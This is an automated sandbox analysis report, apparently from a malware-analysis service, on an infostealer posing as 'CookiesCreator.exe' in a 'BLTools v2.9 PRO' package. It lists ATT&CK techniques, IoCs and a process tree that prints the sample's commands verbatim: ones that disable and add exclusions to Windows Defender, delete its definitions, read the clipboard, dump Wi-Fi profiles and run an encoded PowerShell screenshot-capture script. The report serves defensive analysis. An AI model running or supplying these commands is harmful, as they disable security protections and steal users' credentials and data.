94b1aee4ca3f71653b2a7dd14c67384416acb7b7b3bbcdc6b62abbf47fc1394f

Analysis

max time kernel
139s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2024 22:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BLTools v2.9 PRO/CookiesCreator.exe
Size

7.4MB
MD5

8a7d8331bc19b52df1526c417d6383ba
SHA1

6fefd8f132afe1dc3f2561e95d6a01f9ade0f758
SHA256

9ed9cd27c0fa9db840589e42d402e2fe7da3d65fb6d12770dc773dfda7a40139
SHA512

afb2eef04d33bab1dbdbd8ead3ee2a8f5a681a1bb534c28ee9675aa0d77298491101620a9b50f8fecf48c306542c55320fd51922becdf67abc40106281cd984e
SSDEEP

196608:EutPurErvI9pWjgaAnajMsK23fQC//OoLxhf:3tPurEUWjJjYoo4jLxhf

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
452	powershell.exe
1712	powershell.exe
3616	powershell.exe
1392	powershell.exe
1532	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2184	cmd.exe
3008	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4276	bound.exe
2952	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe
2984	CookiesCreator.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2912	tasklist.exe
4360	tasklist.exe
4912	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral8/files/0x0008000000023c66-22.dat	upx
behavioral8/memory/2984-26-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp	upx
behavioral8/files/0x0008000000023c2c-28.dat	upx
behavioral8/memory/2984-30-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp	upx
behavioral8/files/0x000b000000023c4c-49.dat	upx
behavioral8/files/0x0008000000023c37-48.dat	upx
behavioral8/memory/2984-50-0x00007FFA475E0000-0x00007FFA475EF000-memory.dmp	upx
behavioral8/files/0x0008000000023c36-47.dat	upx
behavioral8/files/0x0008000000023c35-46.dat	upx
behavioral8/files/0x0008000000023c34-45.dat	upx
behavioral8/files/0x0008000000023c33-44.dat	upx
behavioral8/files/0x0008000000023c32-43.dat	upx
behavioral8/files/0x0008000000023c1a-42.dat	upx
behavioral8/files/0x0008000000023c6b-41.dat	upx
behavioral8/files/0x0008000000023c6a-40.dat	upx
behavioral8/files/0x0008000000023c69-39.dat	upx
behavioral8/files/0x0008000000023c65-36.dat	upx
behavioral8/files/0x0008000000023c63-35.dat	upx
behavioral8/files/0x0008000000023c64-32.dat	upx
behavioral8/memory/2984-56-0x00007FFA3E1D0000-0x00007FFA3E1FD000-memory.dmp	upx
behavioral8/memory/2984-60-0x00007FFA39D70000-0x00007FFA39D94000-memory.dmp	upx
behavioral8/memory/2984-59-0x00007FFA3F1B0000-0x00007FFA3F1CA000-memory.dmp	upx
behavioral8/memory/2984-62-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp	upx
behavioral8/memory/2984-66-0x00007FFA40B90000-0x00007FFA40B9D000-memory.dmp	upx
behavioral8/memory/2984-65-0x00007FFA3E500000-0x00007FFA3E519000-memory.dmp	upx
behavioral8/memory/2984-74-0x00007FFA2DE00000-0x00007FFA2DECD000-memory.dmp	upx
behavioral8/memory/2984-73-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp	upx
behavioral8/memory/2984-72-0x00007FFA2DED0000-0x00007FFA2E3F9000-memory.dmp	upx
behavioral8/memory/2984-71-0x00007FFA35720000-0x00007FFA35753000-memory.dmp	upx
behavioral8/memory/2984-69-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp	upx
behavioral8/memory/2984-76-0x00007FFA2FF70000-0x00007FFA2FF84000-memory.dmp	upx
behavioral8/memory/2984-78-0x00007FFA43B80000-0x00007FFA43B8D000-memory.dmp	upx
behavioral8/memory/2984-81-0x00007FFA2E8E0000-0x00007FFA2E9FB000-memory.dmp	upx
behavioral8/memory/2984-170-0x00007FFA39D70000-0x00007FFA39D94000-memory.dmp	upx
behavioral8/memory/2984-223-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp	upx
behavioral8/memory/2984-322-0x00007FFA35720000-0x00007FFA35753000-memory.dmp	upx
behavioral8/memory/2984-325-0x00007FFA2DE00000-0x00007FFA2DECD000-memory.dmp	upx
behavioral8/memory/2984-324-0x00007FFA2DED0000-0x00007FFA2E3F9000-memory.dmp	upx
behavioral8/memory/2984-348-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp	upx
behavioral8/memory/2984-354-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp	upx
behavioral8/memory/2984-362-0x00007FFA2E8E0000-0x00007FFA2E9FB000-memory.dmp	upx
behavioral8/memory/2984-349-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp	upx
behavioral8/memory/2984-377-0x00007FFA43B80000-0x00007FFA43B8D000-memory.dmp	upx
behavioral8/memory/2984-376-0x00007FFA2FF70000-0x00007FFA2FF84000-memory.dmp	upx
behavioral8/memory/2984-367-0x00007FFA3E1D0000-0x00007FFA3E1FD000-memory.dmp	upx
behavioral8/memory/2984-364-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp	upx
behavioral8/memory/2984-388-0x00007FFA35720000-0x00007FFA35753000-memory.dmp	upx
behavioral8/memory/2984-387-0x00007FFA40B90000-0x00007FFA40B9D000-memory.dmp	upx
behavioral8/memory/2984-386-0x00007FFA3E500000-0x00007FFA3E519000-memory.dmp	upx
behavioral8/memory/2984-385-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp	upx
behavioral8/memory/2984-384-0x00007FFA39D70000-0x00007FFA39D94000-memory.dmp	upx
behavioral8/memory/2984-383-0x00007FFA3F1B0000-0x00007FFA3F1CA000-memory.dmp	upx
behavioral8/memory/2984-382-0x00007FFA2DE00000-0x00007FFA2DECD000-memory.dmp	upx
behavioral8/memory/2984-381-0x00007FFA475E0000-0x00007FFA475EF000-memory.dmp	upx
behavioral8/memory/2984-380-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp	upx
behavioral8/memory/2984-379-0x00007FFA2DED0000-0x00007FFA2E3F9000-memory.dmp	upx
behavioral8/memory/2984-378-0x00007FFA2E8E0000-0x00007FFA2E9FB000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4508	cmd.exe
3716	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5016	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
208	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1712	powershell.exe
1712	powershell.exe
3616	powershell.exe
3616	powershell.exe
452	powershell.exe
452	powershell.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
4000	powershell.exe
4000	powershell.exe
1712	powershell.exe
1712	powershell.exe
3616	powershell.exe
4000	powershell.exe
452	powershell.exe
1392	powershell.exe
1392	powershell.exe
2064	powershell.exe
2064	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2912	tasklist.exe
Token: SeDebugPrivilege	4360	tasklist.exe
Token: SeDebugPrivilege	4912	tasklist.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeIncreaseQuotaPrivilege	1148	WMIC.exe
Token: SeSecurityPrivilege	1148	WMIC.exe
Token: SeTakeOwnershipPrivilege	1148	WMIC.exe
Token: SeLoadDriverPrivilege	1148	WMIC.exe
Token: SeSystemProfilePrivilege	1148	WMIC.exe
Token: SeSystemtimePrivilege	1148	WMIC.exe
Token: SeProfSingleProcessPrivilege	1148	WMIC.exe
Token: SeIncBasePriorityPrivilege	1148	WMIC.exe
Token: SeCreatePagefilePrivilege	1148	WMIC.exe
Token: SeBackupPrivilege	1148	WMIC.exe
Token: SeRestorePrivilege	1148	WMIC.exe
Token: SeShutdownPrivilege	1148	WMIC.exe
Token: SeDebugPrivilege	1148	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1148	WMIC.exe
Token: SeRemoteShutdownPrivilege	1148	WMIC.exe
Token: SeUndockPrivilege	1148	WMIC.exe
Token: SeManageVolumePrivilege	1148	WMIC.exe
Token: 33	1148	WMIC.exe
Token: 34	1148	WMIC.exe
Token: 35	1148	WMIC.exe
Token: 36	1148	WMIC.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeIncreaseQuotaPrivilege	1148	WMIC.exe
Token: SeSecurityPrivilege	1148	WMIC.exe
Token: SeTakeOwnershipPrivilege	1148	WMIC.exe
Token: SeLoadDriverPrivilege	1148	WMIC.exe
Token: SeSystemProfilePrivilege	1148	WMIC.exe
Token: SeSystemtimePrivilege	1148	WMIC.exe
Token: SeProfSingleProcessPrivilege	1148	WMIC.exe
Token: SeIncBasePriorityPrivilege	1148	WMIC.exe
Token: SeCreatePagefilePrivilege	1148	WMIC.exe
Token: SeBackupPrivilege	1148	WMIC.exe
Token: SeRestorePrivilege	1148	WMIC.exe
Token: SeShutdownPrivilege	1148	WMIC.exe
Token: SeDebugPrivilege	1148	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1148	WMIC.exe
Token: SeRemoteShutdownPrivilege	1148	WMIC.exe
Token: SeUndockPrivilege	1148	WMIC.exe
Token: SeManageVolumePrivilege	1148	WMIC.exe
Token: 33	1148	WMIC.exe
Token: 34	1148	WMIC.exe
Token: 35	1148	WMIC.exe
Token: 36	1148	WMIC.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeIncreaseQuotaPrivilege	1464	WMIC.exe
Token: SeSecurityPrivilege	1464	WMIC.exe
Token: SeTakeOwnershipPrivilege	1464	WMIC.exe
Token: SeLoadDriverPrivilege	1464	WMIC.exe
Token: SeSystemProfilePrivilege	1464	WMIC.exe
Token: SeSystemtimePrivilege	1464	WMIC.exe
Token: SeProfSingleProcessPrivilege	1464	WMIC.exe
Token: SeIncBasePriorityPrivilege	1464	WMIC.exe
Token: SeCreatePagefilePrivilege	1464	WMIC.exe
Token: SeBackupPrivilege	1464	WMIC.exe
Token: SeRestorePrivilege	1464	WMIC.exe
Token: SeShutdownPrivilege	1464	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3464 wrote to memory of 2984	3464	CookiesCreator.exe	85
PID 3464 wrote to memory of 2984	3464	CookiesCreator.exe	85
PID 2984 wrote to memory of 4248	2984	CookiesCreator.exe	88
PID 2984 wrote to memory of 4248	2984	CookiesCreator.exe	88
PID 2984 wrote to memory of 2596	2984	CookiesCreator.exe	89
PID 2984 wrote to memory of 2596	2984	CookiesCreator.exe	89
PID 2984 wrote to memory of 4148	2984	CookiesCreator.exe	91
PID 2984 wrote to memory of 4148	2984	CookiesCreator.exe	91
PID 2984 wrote to memory of 4664	2984	CookiesCreator.exe	92
PID 2984 wrote to memory of 4664	2984	CookiesCreator.exe	92
PID 4248 wrote to memory of 1712	4248	cmd.exe	96
PID 4248 wrote to memory of 1712	4248	cmd.exe	96
PID 2984 wrote to memory of 2428	2984	CookiesCreator.exe	97
PID 2984 wrote to memory of 2428	2984	CookiesCreator.exe	97
PID 2984 wrote to memory of 1432	2984	CookiesCreator.exe	98
PID 2984 wrote to memory of 1432	2984	CookiesCreator.exe	98
PID 2984 wrote to memory of 1664	2984	CookiesCreator.exe	101
PID 2984 wrote to memory of 1664	2984	CookiesCreator.exe	101
PID 2984 wrote to memory of 2184	2984	CookiesCreator.exe	102
PID 2984 wrote to memory of 2184	2984	CookiesCreator.exe	102
PID 2984 wrote to memory of 1384	2984	CookiesCreator.exe	104
PID 2984 wrote to memory of 1384	2984	CookiesCreator.exe	104
PID 2984 wrote to memory of 3832	2984	CookiesCreator.exe	106
PID 2984 wrote to memory of 3832	2984	CookiesCreator.exe	106
PID 2984 wrote to memory of 4508	2984	CookiesCreator.exe	108
PID 2984 wrote to memory of 4508	2984	CookiesCreator.exe	108
PID 2984 wrote to memory of 4580	2984	CookiesCreator.exe	110
PID 2984 wrote to memory of 4580	2984	CookiesCreator.exe	110
PID 2984 wrote to memory of 2736	2984	CookiesCreator.exe	113
PID 2984 wrote to memory of 2736	2984	CookiesCreator.exe	113
PID 1432 wrote to memory of 2912	1432	cmd.exe	115
PID 1432 wrote to memory of 2912	1432	cmd.exe	115
PID 2428 wrote to memory of 4360	2428	cmd.exe	116
PID 2428 wrote to memory of 4360	2428	cmd.exe	116
PID 2596 wrote to memory of 3616	2596	cmd.exe	117
PID 2596 wrote to memory of 3616	2596	cmd.exe	117
PID 4664 wrote to memory of 4276	4664	cmd.exe	118
PID 4664 wrote to memory of 4276	4664	cmd.exe	118
PID 4664 wrote to memory of 4276	4664	cmd.exe	118
PID 1384 wrote to memory of 4912	1384	cmd.exe	119
PID 1384 wrote to memory of 4912	1384	cmd.exe	119
PID 4508 wrote to memory of 3716	4508	cmd.exe	120
PID 4508 wrote to memory of 3716	4508	cmd.exe	120
PID 2184 wrote to memory of 3008	2184	cmd.exe	121
PID 2184 wrote to memory of 3008	2184	cmd.exe	121
PID 4148 wrote to memory of 452	4148	cmd.exe	122
PID 4148 wrote to memory of 452	4148	cmd.exe	122
PID 4580 wrote to memory of 208	4580	cmd.exe	123
PID 4580 wrote to memory of 208	4580	cmd.exe	123
PID 1664 wrote to memory of 1148	1664	cmd.exe	124
PID 1664 wrote to memory of 1148	1664	cmd.exe	124
PID 3832 wrote to memory of 1932	3832	cmd.exe	125
PID 3832 wrote to memory of 1932	3832	cmd.exe	125
PID 2736 wrote to memory of 4000	2736	cmd.exe	127
PID 2736 wrote to memory of 4000	2736	cmd.exe	127
PID 2984 wrote to memory of 2932	2984	CookiesCreator.exe	128
PID 2984 wrote to memory of 2932	2984	CookiesCreator.exe	128
PID 2932 wrote to memory of 1812	2932	cmd.exe	130
PID 2932 wrote to memory of 1812	2932	cmd.exe	130
PID 2984 wrote to memory of 1792	2984	CookiesCreator.exe	131
PID 2984 wrote to memory of 1792	2984	CookiesCreator.exe	131
PID 1792 wrote to memory of 4472	1792	cmd.exe	177
PID 1792 wrote to memory of 4472	1792	cmd.exe	177
PID 2984 wrote to memory of 1308	2984	CookiesCreator.exe	134

C:\Users\Admin\AppData\Local\Temp\BLTools v2.9 PRO\CookiesCreator.exe
"C:\Users\Admin\AppData\Local\Temp\BLTools v2.9 PRO\CookiesCreator.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3464
- C:\Users\Admin\AppData\Local\Temp\BLTools v2.9 PRO\CookiesCreator.exe
  "C:\Users\Admin\AppData\Local\Temp\BLTools v2.9 PRO\CookiesCreator.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BLTools v2.9 PRO\CookiesCreator.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BLTools v2.9 PRO\CookiesCreator.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1384
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8Ac